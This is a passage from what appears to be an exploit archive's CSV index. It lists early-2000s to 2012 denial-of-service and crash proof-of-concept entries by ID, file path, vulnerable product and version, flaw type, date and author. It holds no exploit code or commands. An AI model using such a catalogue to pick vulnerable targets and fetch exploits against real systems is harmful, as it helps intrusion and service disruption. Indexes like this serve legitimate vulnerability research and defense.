Roberson",hardware,dos, -21644,exploits/unix/dos/21644.txt,"Pine 4.x - Empty MIME Boundary Denial of Service",2002-07-24,"Martin J. Muench",unix,dos, -21645,exploits/windows/dos/21645.txt,"Foxit Reader 5.4.3.0920 - Crash (PoC)",2012-10-01,coolkaveh,windows,dos, -21653,exploits/windows/dos/21653.c,"KaZaA Media Desktop 1.7.1 - Large Message Denial of Service",2002-07-25,"Josh & omega",windows,dos, -21655,exploits/hardware/dos/21655.c,"Cisco IOS 11.x - TFTP Server Long File Name Buffer Overflow",2002-07-26,FX,hardware,dos, -21656,exploits/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router - Long HTTP Request Denial of Service",2002-07-27,FX,hardware,dos, -21657,exploits/hardware/dos/21657.txt,"HP ProCurve Switch 4000M - SNMP Write Denial of Service",2002-07-27,FX,hardware,dos, -21673,exploits/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos, -21694,exploits/windows/dos/21694.pl,"602Pro LAN SUITE 2002 - Telnet Proxy localhost Denial of Service",2002-08-03,"Stan Bubrouski",windows,dos, -21703,exploits/windows/dos/21703.txt,"Citrix Metaframe for Windows NT 4.0 TSE 1.8 - Java ICA Environment Denial of Service",2002-08-11,"Tanin Ehrami",windows,dos, -21712,exploits/windows/dos/21712.txt,"Google Toolbar 1.1.60 - Search Function Denial of Service",2002-08-15,onet,windows,dos, -21736,exploits/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router - IP Packet Flags Denial of Service",2002-08-22,"Lukasz Bromirski",hardware,dos, -21737,exploits/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos, -21739,exploits/windows/dos/21739.pl,"JPEGsnoop 1.5.2 - WriteAV Crash (PoC)",2012-10-04,"Jean Pascal Pereira",windows,dos, -21741,exploits/windows/dos/21741.txt,"XnView 1.99.1 - '.JLS' File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos, -21746,exploits/windows/dos/21746.c,"Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos, -21747,exploits/windows/dos/21747.txt,"Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos, -21756,exploits/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos, -21770,exploits/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client - Authentication Denial of Service",2002-09-03,Phenoelit,hardware,dos, -21775,exploits/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 - New Line Denial of Service",2002-09-02,saman,linux,dos, -21782,exploits/multiple/dos/21782.txt,"Oracle 8.1.x/9.0/9.2 - TNS Listener Service_CurLoad Remote Denial of Service",2002-09-09,"Rapid 7",multiple,dos, -21789,exploits/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link - Denial of Service",2002-09-09,"Stefano Zanero",windows,dos, -21791,exploits/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch - Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos, -21792,exploits/windows/dos/21792.txt,"Savant Web Server 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",windows,dos, -21795,exploits/windows/dos/21795.pl,"PlanetWeb 1.14 - GET Buffer Overflow",2002-09-16,UkR-XblP,windows,dos, -21813,exploits/windows/dos/21813.c,"Trillian 0.73/0.74 - IRC JOIN Buffer Overflow",2002-09-20,"Lance Fitz-Herbert",windows,dos, -21816,exploits/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 - IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",windows,dos, -21819,exploits/windows/dos/21819.c,"Trillian 0.74 - IRC Raw Messages Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos, -21821,exploits/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos, -21823,exploits/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos, -21824,exploits/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos, -21826,exploits/windows/dos/21826.pl,"FL Studio 10 Producer Edition - Buffer Overflow (SEH) (PoC)",2012-10-09,Dark-Puzzle,windows,dos, -21828,exploits/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos, -21830,exploits/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos, -21854,exploits/linux/dos/21854.c,"Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos, -21889,exploits/windows/dos/21889.pl,"VideoLAN VLC Media Player 2.0.3 - '.png' ReadAV Crash (PoC)",2012-10-11,"Jean Pascal Pereira",windows,dos, -21907,exploits/windows/dos/21907.c,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (1)",2002-10-05,Morgan,windows,dos, -21908,exploits/windows/dos/21908.pl,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (2)",2002-10-05,subj,windows,dos, -21909,exploits/windows/dos/21909.txt,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (3)",2002-10-05,p0pt4rtz,windows,dos, -21911,exploits/multiple/dos/21911.txt,"Oracle 9i Application Server 9.0.2 Web Cache Administration Tool - Denial of Service",2002-10-06,@stake,multiple,dos, -21915,exploits/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block Denial of Service",2002-10-08,"Yiming Gong",windows,dos, -33403,exploits/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta",windows,dos, -21935,exploits/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - GET Denial of Service",2002-10-12,"Marc Ruef",windows,dos, -21938,exploits/windows/dos/21938.txt,"TelCondex SimpleWebserver 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos, -21939,exploits/hardware/dos/21939.txt,"Polycom ViaVideo 2.2/3.0 - Denial of Service",2002-10-15,prophecy.net.nz,hardware,dos, -21941,exploits/windows/dos/21941.txt,"Polycom 2.2/3.0 - ViaVideo Buffer Overflow",2002-10-15,prophecy.net.nz,windows,dos, -21943,exploits/windows/dos/21943.c,"Zone Labs ZoneAlarm 3.0/3.1 - Syn Flood Denial of Service",2002-10-16,"Abraham Lincoln",windows,dos, -21949,exploits/unix/dos/21949.txt,"IBM Websphere Caching Proxy 3.6/4.0 - Denial of Service",2002-10-18,Rapid7,unix,dos, -21951,exploits/windows/dos/21951.c,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (1)",2002-10-22,lion,windows,dos, -21952,exploits/windows/dos/21952.c,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (2)",2002-10-22,Trancer,windows,dos, -21953,exploits/windows/dos/21953.txt,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)",2002-10-18,Rapid7,windows,dos, -21954,exploits/windows/dos/21954.txt,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (4)",2002-10-18,anonymous,windows,dos, -21963,exploits/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet",2002-10-24,D4rkGr3y,windows,dos, -21965,exploits/windows/dos/21965.txt,"Alt-N MDaemon 6.0.x - POP Server Buffer Overflow",2002-10-28,D4rkGr3y,windows,dos, -21971,exploits/hardware/dos/21971.txt,"Cisco AS5350 - Universal Gateway Portscan Denial of Service",2002-10-28,"Thomas Munn",hardware,dos, -21972,exploits/windows/dos/21972.pl,"SmartMail Server 2.0 - Closed Connection Denial of Service",2002-10-31,"securma massine",windows,dos, -21973,exploits/windows/dos/21973.pl,"SmartMail Server 1.0 Beta 10 - Oversized Request Denial of Service",2002-10-31,"securma massine",windows,dos, -21975,exploits/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x - 'Gozila.cgi' Denial of Service",2002-11-01,"Jeep 94",hardware,dos, -21978,exploits/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4 / D-Link DI-804 4.68/Dl-704 2.56 b5 - Embedded HTTP Server Denial of Service",2002-11-01,"Mark Litchfield",hardware,dos, -21981,exploits/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service",2002-11-02,anonymous,windows,dos, -21982,exploits/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos, -21984,exploits/unix/dos/21984.c,"QNX 6.1 - 'TimeCreate' Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos, -21985,exploits/linux/dos/21985.txt,"Pine 4.x - 'From:' Heap Corruption",2002-11-07,lsjoberg,linux,dos, -21986,exploits/windows/dos/21986.pl,"Microsoft Windows Media Player 10 - '.avi' Integer Division By Zero Crash (PoC)",2012-10-15,Dark-Puzzle,windows,dos, -21991,exploits/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p 'quartz.dll' Heap Pointer Overwrite (PoC)",2012-10-15,"James Ritchey",windows,dos, -22006,exploits/windows/dos/22006.txt,"EZHomeTech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",windows,dos, -22010,exploits/multiple/dos/22010.txt,"Hotfoon Dialer 4.0 - Buffer Overflow",2002-11-11,"S G Masood",multiple,dos, -22011,exploits/linux/dos/22011.c,"ISC BIND 8.3.x - OPT Record Large UDP Denial of Service",2002-11-12,spybreak,linux,dos, -22019,exploits/windows/dos/22019.pl,"IISPop 1.161/1.181 - Remote Buffer Overflow Denial of Service",2002-11-14,"securma massine",windows,dos, -22031,exploits/unix/dos/22031.txt,"Rational ClearCase 4.1 - Portscan Denial of Service",2002-11-22,"Stefan Bagdohn",unix,dos, -22033,exploits/linux/dos/22033.txt,"WSMP3 0.0.1/0.0.2 - Multiple Buffer Overflow Vulnerabilities",2002-11-25,"dong-h0un U",linux,dos, -22053,exploits/multiple/dos/22053.txt,"Moby NetSuite 1.0/1.2 - POST Handler Buffer Overflow",2002-11-29,"Matthew Murphy",multiple,dos, -22056,exploits/linux/dos/22056.txt,"Pserv 2.0 - HTTP Version Specifier Buffer Overflow",2002-11-30,"Matthew Murphy",linux,dos, -22059,exploits/linux/dos/22059.pl,"Pserv 2.0 - HTTP Request Parsing Buffer Overflow",2002-11-01,"Matthew Murphy",linux,dos, -22060,exploits/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos, -22061,exploits/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos, -22062,exploits/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Buffer Overflow",2002-12-03,"Core Security",hardware,dos, -22068,exploits/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos, -22074,exploits/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic (Denial of Service)",2002-11-07,shibby,osx,dos, -22079,exploits/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos, -22081,exploits/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos, -22100,exploits/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos, -22105,exploits/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos, -22110,exploits/php/dos/22110.txt,"PHP-Nuke 6.0 - 'modules.php' Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos, -22117,exploits/windows/dos/22117.txt,"iCal 3.7 - HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos, -22118,exploits/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos, -22119,exploits/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos, -22121,exploits/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos, -22122,exploits/windows/dos/22122.pl,"EType EServ 2.9x - POP3 Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos, -22123,exploits/windows/dos/22123.pl,"EType EServ 2.9x - SMTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos, -22124,exploits/windows/dos/22124.pl,"EType EServ 1.9x - NNTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos, -22132,exploits/windows/dos/22132.txt,"Microsoft Windows XP/2000 - Fontview Denial of Service",2003-01-06,andrew,windows,dos, -22155,exploits/windows/dos/22155.pl,"Adobe Reader 10.1.4 - Crash (PoC)",2012-10-22,coolkaveh,windows,dos, -22154,exploits/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos, -22162,exploits/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 - ICMP Packet Flood Denial of Service",2003-01-13,"Pavel P",windows,dos, -22172,exploits/windows/dos/22172.txt,"Trend Micro Virus Control System 1.8 - Denial of Service",2003-01-15,"Rod Boron",windows,dos, -22183,exploits/linux/dos/22183.c,"GameSpy 3D 2.62 - Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos, -22191,exploits/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service",2003-01-22,"Matthew Murphy",linux,dos, -22196,exploits/windows/dos/22196.txt,"Rediff Bol 2.0.2 - URL Handling Denial of Service",2003-01-23,"S G Masood",windows,dos, -22197,exploits/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun",2003-01-24,"USG team",linux,dos, -22207,exploits/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",multiple,dos, -22214,exploits/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos, -22215,exploits/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos, -22220,exploits/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 - 'Server Banner' Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos, -22221,exploits/windows/dos/22221.pl,"Electrasoft 32Bit FTP 9.49.1 - Client Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos, -22223,exploits/multiple/dos/22223.txt,"Epic Games Unreal Engine 436 - Client Unreal URL Denial of Service",2003-02-05,"Auriemma Luigi",multiple,dos, -22230,exploits/multiple/dos/22230.pl,"Netscape Enterprise Server 4.1 - HTTP Method Name Buffer Overflow",2001-05-19,"Robert Cardona",multiple,dos, -22232,exploits/windows/dos/22232.txt,"Microsoft Windows XP - HCP URI Buffer Overflow",2001-11-21,mozoral,windows,dos, -22237,exploits/windows/dos/22237.txt,"Microsoft Office Picture Manager 2010 - Crash (PoC)",2012-10-25,coolkaveh,windows,dos, -22239,exploits/windows/dos/22239.txt,"Opera 6.0/7.0 - 'Username' URI Warning Dialog Buffer Overflow",2003-02-10,nesumin,windows,dos, -22240,exploits/windows/dos/22240.txt,"Opera 6.0/7.0 - opera.PluginContext Native Method Denial of Service",2003-01-13,"Marc Schoenefeld",windows,dos, -22243,exploits/linux/dos/22243.txt,"RARLAB FAR 1.65/1.70 - File Manager Buffer Overflow",2003-02-11,3APA3A,linux,dos, -22245,exploits/windows/dos/22245.txt,"Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow",2003-02-11,3APA3A,windows,dos, -22249,exploits/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 - 'libIM' Buffer Overflow",2003-02-12,"Euan Briggs",aix,dos, -22250,exploits/multiple/dos/22250.sh,"iParty Conferencing Server - Denial of Service",1999-05-08,wh00t,multiple,dos, -22255,exploits/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos, -22258,exploits/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos, -22259,exploits/linux/dos/22259.c,"BitchX 1.0 - 'RPL_NAMREPLY' Denial of Service",2003-01-30,argv,linux,dos, -22273,exploits/linux/dos/22273.c,"Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (1)",2003-02-23,"Richard Kettlewel",linux,dos, -22286,exploits/unix/dos/22286.html,"Netscape 6.0/7.0 - Style Sheet Denial of Service",2003-02-25,Jocke,unix,dos, -22287,exploits/unix/dos/22287.html,"Netscape 7.0 - JavaScript Regular Expression Denial of Service",2003-02-25,dwm,unix,dos, -22290,exploits/windows/dos/22290.c,"Electronic Arts Battlefield 1942 1.2/1.3 - Remote Administration Authentication Buffer Overflow",2003-02-26,greuff,windows,dos, -22294,exploits/linux/dos/22294.c,"TCPDump 3.x - Malformed ISAKMP Packet Denial of Service",2003-03-01,"The Salvia Twist",linux,dos, -22302,exploits/windows/dos/22302.rb,"hMAilServer 5.3.3 - IMAP Remote Crash (PoC)",2012-10-28,"John Smith",windows,dos, -22303,exploits/windows/dos/22303.pl,"Microsoft Windows Help Program - 'WinHlp32.exe' Crash (PoC)",2012-10-28,coolkaveh,windows,dos, -22330,exploits/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash (PoC) (1)",2012-10-29,coolkaveh,windows,dos, -22333,exploits/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos, -22334,exploits/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",windows,dos, -22310,exploits/windows/dos/22310.txt,"Microsoft Publisher 2010 - Crash (PoC)",2012-10-28,coolkaveh,windows,dos, -22328,exploits/windows/dos/22328.txt,"Dr.Web 4.x - Virus Scanner Folder Name Buffer Overflow",2003-03-05,"Fernandez Madrid",windows,dos, -22345,exploits/multiple/dos/22345.txt,"Multitech RouteFinder 550 - Remote Memory Corruption",2003-03-11,"Peter Kruse",multiple,dos, -22352,exploits/linux/dos/22352.txt,"TCPDump 3.6/3.7 - Malformed RADIUS Packet Denial of Service",2003-03-14,"Bill Ralph",linux,dos, -22358,exploits/multiple/dos/22358.cfm,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (1)",2003-03-15,"Marc Schoenefeld",multiple,dos, -22359,exploits/multiple/dos/22359.xsl,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (2)",2003-03-15,"Marc Schoenefeld",multiple,dos, -22360,exploits/multiple/dos/22360.java,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (3)",2003-03-15,"Marc Schoenefeld",multiple,dos, -22370,exploits/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service",2003-03-17,"Core Security",linux,dos, -22390,exploits/windows/dos/22390.c,"Microsoft ActiveSync 3.5 - Null Pointer Dereference Denial of Service",2003-03-20,"Andy Davis",windows,dos, -22395,exploits/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption Vulnerabilities",2003-03-21,"Auriemma Luigi",windows,dos, -22397,exploits/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus - Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos, -22401,exploits/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",windows,dos, -22402,exploits/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC)",2012-11-01,coolkaveh,windows,dos, -22406,exploits/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos, -22407,exploits/hardware/dos/22407.txt,"NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos, -22415,exploits/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",hardware,dos, -22417,exploits/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",windows,dos, -22419,exploits/php/dos/22419.php,"PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow",2003-03-25,"Sir Mordred",php,dos, -22420,exploits/windows/dos/22420.txt,"Emule 0.27b - Empty Nickname Chat Request Denial of Service",2003-03-25,"Auriemma Luigi",windows,dos, -22425,exploits/php/dos/22425.php,"PHP 4.x - 'socket_recv()' Signed Integer Memory Corruption",2003-03-26,"Sir Mordred",php,dos, -22426,exploits/php/dos/22426.php,"PHP 4.x - 'socket_recvfrom()' Signed Integer Memory Corruption",2003-03-26,"Sir Mordred",php,dos, -22433,exploits/linux/dos/22433.pl,"Monkey HTTP Daemon 0.4/0.5/0.6 - Excessive POST Data Buffer Overflow",2003-03-24,"Matthew Murphy",linux,dos, -22435,exploits/php/dos/22435.php,"PHP 4.3.x/5.0 - 'openlog()' Buffer Overflow",2003-03-27,sir.mordred@hushmail.com,php,dos, -22440,exploits/hardware/dos/22440.c,"D-Link DI-614+ - IP Fragment Reassembly Denial of Service",1998-04-16,humble,hardware,dos, -22441,exploits/multiple/dos/22441.txt,"Mozilla 1.x / Opera 7.0 - LiveConnect JavaScript Denial of Service",2003-03-28,"Marc Schoenefeld",multiple,dos, -22446,exploits/linux/dos/22446.txt,"EZ Server 1.0 - Long Argument Local Denial of Service",2003-03-31,"gregory Le Bras",linux,dos, -22447,exploits/windows/dos/22447.txt,"HP Instant TopTools 5.0 - Remote Denial of Service",2003-03-31,"Erik Parker",windows,dos, -22460,exploits/windows/dos/22460.txt,"Abyss Web Server 1.1.2 - Incomplete HTTP Request Denial of Service",2003-04-05,"Auriemma Luigi",windows,dos, -22464,exploits/windows/dos/22464.txt,"Adobe Reader 11.0.0 - Stack Overflow Crash (PoC)",2012-11-04,coolkaveh,windows,dos, -22467,exploits/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,windows,dos, -22483,exploits/osx/dos/22483.c,"Apple Mac OSX 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",osx,dos, -22494,exploits/php/dos/22494.txt,"osCommerce 2.2 - 'product_info.php' Denial of Service",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos, -22502,exploits/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service (1)",2003-04-15,badpack3t,multiple,dos, -22503,exploits/multiple/dos/22503.c,"TW-WebServer 1.0 - Denial of Service (2)",2003-04-16,"Shashank pandey",multiple,dos, -22505,exploits/multiple/dos/22505.txt,"Apache Mod_Access_Referer 1.0.2 - Null Pointer Dereference Denial of Service",2003-04-16,zillion,multiple,dos, -22508,exploits/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x - Rejected Connection Memory Leakage Denial of Service",2003-04-18,"Steve Grubb",linux,dos, -22512,exploits/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorisation Heap Overflow",2003-04-21,"Matthew Murphy",multiple,dos, -22514,exploits/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorisation Format String",2003-04-21,"Matthew Murphy",multiple,dos, -22516,exploits/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos, -22518,exploits/windows/dos/22518.html,"Microsoft 'Shlwapi.dll' 6.0.2800.1106 - Malformed HTML Form Tag Denial of Service",2003-04-22,"Ramon Pinuaga Cascales",windows,dos, -22527,exploits/linux/dos/22527.c,"Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos, -22535,exploits/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - GET Multiple Denial of Service Vulnerabilities",2003-04-24,"Positive Technologies",multiple,dos, -22536,exploits/multiple/dos/22536.txt,"Opera 7.10 - Permanent Denial of Service",2003-04-24,"David F. Madrid",multiple,dos, -22537,exploits/linux/dos/22537.c,"Libopt.a 3.1x - Error Logging Buffer Overflow (1)",2003-04-24,kf,linux,dos, -22550,exploits/windows/dos/22550.pl,"Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos, -22551,exploits/windows/dos/22551.pl,"3D-FTP Client 4.0 - Buffer Overflow",2003-04-28,Over_G,windows,dos, -22552,exploits/hp-ux/dos/22552.txt,"HP-UX 10.x/11.x - RExec Remote 'Username' Flag Local Buffer Overrun",2003-04-29,"Davide Del Vecchio",hp-ux,dos, -22553,exploits/windows/dos/22553.txt,"Microsoft BizTalk Server 2002 - HTTP Receiver Buffer Overflow",2003-04-30,"Cesar Cerrudo",windows,dos, -22560,exploits/linux/dos/22560.txt,"KDE Konqueror 3.0.3 - Malformed HTML Page Denial of Service",2003-05-02,Joachim_Strombergson,linux,dos, -22561,exploits/hp-ux/dos/22561.txt,"HP-UX 11 RWrite - Buffer Overflow",2003-05-02,bt@delfi.lt,hp-ux,dos, -22568,exploits/windows/dos/22568.pl,"FloosieTek FTGate PRO 1.22 - SMTP MAIL FROM Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos, -22569,exploits/windows/dos/22569.pl,"FloosieTek FTGate PRO 1.22 - SMTP RCPT TO Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos, -22576,exploits/windows/dos/22576.txt,"Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 - Buffer Overrun",2003-05-09,cesaro,windows,dos, -22581,exploits/windows/dos/22581.pl,"Youngzsoft CMailServer 4.0 - MAIL FROM Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos, -22582,exploits/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - 'RCPT TO' Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos, -22585,exploits/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion (Denial of Service) (1)",2003-05-11,"Matthew Murphy",windows,dos, -22586,exploits/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion (Denial of Service) (2)",2003-05-11,rash,windows,dos, -22587,exploits/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos, -22591,exploits/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,windows,dos, -22596,exploits/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli & Fabio Annunziato",hardware,dos, -22602,exploits/palm_os/dos/22602.c,"PalmOS 3/4 - ICMP Flood Remote Denial of Service",2003-05-14,"Shaun Colley",palm_os,dos, -22608,exploits/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 - Malformed HTTP Request Denial of Service",2003-05-16,euronymous,windows,dos, -22610,exploits/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - GET Buffer Overflow",2003-05-16,euronymous,windows,dos, -22619,exploits/linux/dos/22619.txt,"CUPS 1.1.x - Cupsd Request Method Denial of Service",2003-05-20,"Phil D'Amore",linux,dos, -22621,exploits/windows/dos/22621.txt,"Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow",2003-05-20,"David F. Madrid",windows,dos, -22624,exploits/linux/dos/22624.c,"BZFlag 1.7 g0 - Reconnect Denial of Service",2003-05-21,"russian code molester",linux,dos, -22629,exploits/osx/dos/22629.txt,"Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module - Integer Overflow",2003-05-22,"Sir Mordred",osx,dos, -22634,exploits/multiple/dos/22634.txt,"Nessus 2.0.x - LibNASL Arbitrary Code Execution",2003-05-22,"Sir Mordred",multiple,dos, -22637,exploits/windows/dos/22637.pl,"Prishtina FTP Client 1.x - Remote Denial of Service",2003-05-23,DHGROUP,windows,dos, -22638,exploits/irix/dos/22638.txt,"IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow",2003-05-23,bazarr@ziplip.com,irix,dos, -22647,exploits/hardware/dos/22647.txt,"D-Link 